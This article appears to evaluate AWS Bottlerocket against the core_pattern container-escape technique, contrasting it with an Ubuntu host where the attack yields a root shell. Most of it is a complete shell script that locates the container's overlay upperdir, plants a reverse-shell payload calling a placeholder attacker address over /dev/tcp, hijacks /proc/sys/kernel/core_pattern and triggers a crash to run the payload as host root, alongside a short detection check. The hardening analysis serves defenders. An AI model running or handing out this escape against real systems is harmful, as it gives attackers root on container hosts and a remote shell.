6 min read | Saved February 14, 2026
This article examines AWS Bottlerocket, a minimal operating system built for hosting containers. It tests whether Bottlerocket stops a well-known container escape (abusing the kernel's core_pattern usermode helper from a privileged container) and contrasts the result with the same attack on a less hardened Ubuntu host, where it yields a root shell.
AWS Bottlerocket is a minimal, purpose-built Linux distribution for running containers. It shrinks the host's attack surface with an image-based, read-only root filesystem, an enforcing SELinux policy, and no shell or package manager on the host itself. Updates are whole-image and atomic rather than package-by-package, with update metadata signed and verified through The Update Framework (TUF). Administration is done from separate host containers (an admin container that provides SSH access and a control container that runs the SSM agent), which keeps management tooling apart from the application workloads.
The article tests Bottlerocket against an escape that abuses the kernel's usermode helper for core dumps. If /proc/sys/kernel/core_pattern begins with "|", the rest of the value names a program the kernel executes as root, in the host's namespaces, every time a process dumps core. In a privileged container /proc/sys is writable, so an attacker writes a payload into the container's filesystem, looks up the path at which that file is visible from the host (the overlay upperdir), points core_pattern at it, and crashes any process. The article walks through building a reverse-shell payload, triggering the coredump, and landing a root shell on an ordinary Ubuntu host.
Running the same steps on a Bottlerocket node ends differently. The payload can still be planted and the coredump still triggered, but Bottlerocket's hardening prevents the payload from executing: the listener waiting on the attacker's EC2 instance stays silent. The article tests this one technique only; the result shows Bottlerocket blocking this specific escape, not every possible one.
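The procedure above condensed into one script, added here as an example rather than taken from the article. It parses the container's overlay upperdir out of /proc/self/mountinfo, builds the core_pattern value, plants the payload and triggers the crash, and includes a defender-side heuristic for spotting a hijacked core_pattern on the host. The listener address and port, the payload path /evil.sh, the helper names, and the embedded sample mountinfo lines are all assumptions constructed for this example.

```shell
#!/bin/sh
# Added example (not the article's code): the core_pattern usermode-helper
# escape from a privileged container, plus a check a defender would run
# on the host.  Listener address/port are placeholders (assumed).
ATTACKER_IP="${ATTACKER_IP:-203.0.113.10}"   # assumption: reverse-shell listener
ATTACKER_PORT="${ATTACKER_PORT:-4444}"       # assumption: listener port
PAYLOAD_IN_CONTAINER="/evil.sh"              # must live on the overlay root, not a tmpfs

# Constructed sample of /proc/self/mountinfo as seen inside a Docker
# container (overlay on /, proc on /proc); used only for offline testing.
sample_mountinfo() {
    cat <<'EOF'
1234 1000 0:45 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/ABC:/var/lib/docker/overlay2/l/DEF,upperdir=/var/lib/docker/overlay2/0123abcd/diff,workdir=/var/lib/docker/overlay2/0123abcd/work
1235 1234 0:46 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
EOF
}

# Print the host-side upperdir of the container's root overlay.  The kernel
# resolves core_pattern in the initial mount namespace, so a file written at
# /evil.sh inside the container is <upperdir>/evil.sh on the host.
# Argument: mountinfo file to read ("-" for stdin), default /proc/self/mountinfo.
overlay_upperdir() {
    awk '$5 == "/" && $(NF-2) == "overlay" {
        n = split($NF, opts, ",")
        for (i = 1; i <= n; i++)
            if (index(opts[i], "upperdir=") == 1) { print substr(opts[i], 10); exit }
    }' "${1:-/proc/self/mountinfo}"
}

# Build the core_pattern value: a leading "|" makes the kernel exec the path
# as a usermode helper (root, host namespaces) on every coredump.
build_core_pattern() {
    printf '|%s%s\n' "$1" "$2"
}

# core_pattern is a 128-byte kernel buffer (CORENAME_MAX_SIZE); longer values
# are truncated and the helper path silently breaks.  Returns 0 if it fits.
core_pattern_fits() {
    [ "${#1}" -lt 128 ]
}

# Defender-side heuristic (added here): a pipe handler whose program is not a
# distro binary under /usr/lib or /usr/libexec (where systemd-coredump and
# similar helpers live) deserves a look.  Returns 0 when suspicious.
core_pattern_suspicious() {
    case "$1" in
        "|/usr/lib/"*|"|/usr/libexec/"*) return 1 ;;
        "|"*) return 0 ;;
        *) return 1 ;;
    esac
}

run_escape() {
    upper="$(overlay_upperdir)"
    [ -n "$upper" ] || { echo "no overlay root found" >&2; return 1; }
    pattern="$(build_core_pattern "$upper" "$PAYLOAD_IN_CONTAINER")"
    core_pattern_fits "$pattern" || { echo "core_pattern too long" >&2; return 1; }

    # Payload the host kernel runs as root; /bin/bash must exist on the host.
    cat > "$PAYLOAD_IN_CONTAINER" <<EOF
#!/bin/bash
bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1
EOF
    chmod +x "$PAYLOAD_IN_CONTAINER"

    # Only works where /proc/sys is writable, i.e. a privileged container.
    echo "$pattern" > /proc/sys/kernel/core_pattern

    # Trigger the dump.  Pipe handlers run even with RLIMIT_CORE=0, so no
    # ulimit change is needed; the helper fires in the host's namespaces.
    sh -c 'kill -SEGV $$'
}

# Only run the escape when explicitly asked; sourcing the file just defines helpers.
if [ "${1:-}" = "--exploit" ]; then run_escape; fi
```

Invoke as `sh escape.sh --exploit` inside the privileged container with a listener already running on the assumed address; without the flag the script only defines its functions. On the host, `core_pattern_suspicious "$(cat /proc/sys/kernel/core_pattern)"` is the check: a pipe handler pointing under /var/lib/docker or /var/lib/containerd is the signature of this technique. The payload must sit on the container's root overlay, since a file on a separate tmpfs mount never appears in the upperdir.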